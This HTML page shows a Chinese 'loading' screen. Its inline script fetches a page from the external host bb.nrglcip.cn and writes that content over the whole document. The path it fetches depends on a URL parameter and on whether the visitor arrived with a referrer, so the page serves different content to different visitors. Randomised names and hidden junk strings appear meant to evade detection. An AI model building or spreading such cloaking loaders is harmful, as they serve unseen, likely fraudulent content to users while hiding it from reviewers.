<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BJyGwHUk4qT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BJyGwHUk4qT .DZOzN20XL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BJyGwHUk4qT .content {
            line-height: 50px;
            text-align: center
        }

        .BJyGwHUk4qT .img {
            width: 100%
        }

        .BJyGwHUk4qT .xVpDVdxPJTS {
            text-align: center
        }

        .BJyGwHUk4qT .xVpDVdxPJTS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BJyGwHUk4qT .xVpDVdxPJTS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BJyGwHUk4qT .xVpDVdxPJTS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BJyGwHUk4qT .xVpDVdxPJTS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BJyGwHUk4qT .xVpDVdxPJTS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BJyGwHUk4qT .xVpDVdxPJTS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BJyGwHUk4qT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function a3s6BS0bKic(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var H2sME = a3s6BS0bKic('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ H2sME +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ H2sME +".html?a=share";
		}
		
        rDiys90u4=url+"#"+new Date().getTime();
        rDiys90u4 && function() {
            $.get(rDiys90u4, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >D2kiQ6Ylku4TYz2XPTn</b>
<div style='display:none'>GHvC6PuZNtAGnnV8I4OownlWlxANB4V5g6oZN17HttiYmkuT7iw710Hn08m0jCVLB18swew</div>
<a  href='#' style='display:none'>lxp5dXMPceBueK842</a>
<ul style='display:none' >OFeborD5vbyQt0AgjZWL03uJ1oxoRtLb1LRNrYQMYnQnaV6WpA63S9QUoU6U3I3si7vLKm1hjMEfxZzLQ5PvP4mEtKje9BtTT6ufV</ul>
<div style='display:none'>GHvC6PuZNtAGnnV8I4OownlWlxANB4V5g6oZN17HttiYmkuT7iw710Hn08m0jCVLB18swew</div><div class="BJyGwHUk4qT">
    <div class="DZOzN20XL">
        <div class="xVpDVdxPJTS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >eu9GvoxbG0TZm7cQYwHtbkGh8V</h1>
<a  href='#' style='display:none'>YMfHXZdioiZaDGpxZcoRPjaAHspUwZ27Pb33SnnpVY4J4YWgqTQFG6QpLZNV7WE4JZ5VoXs5ZXLmbGnVYZF3mvK</a>
<h1 style='display:none' >eu9GvoxbG0TZm7cQYwHtbkGh8V</h1></body>
</html>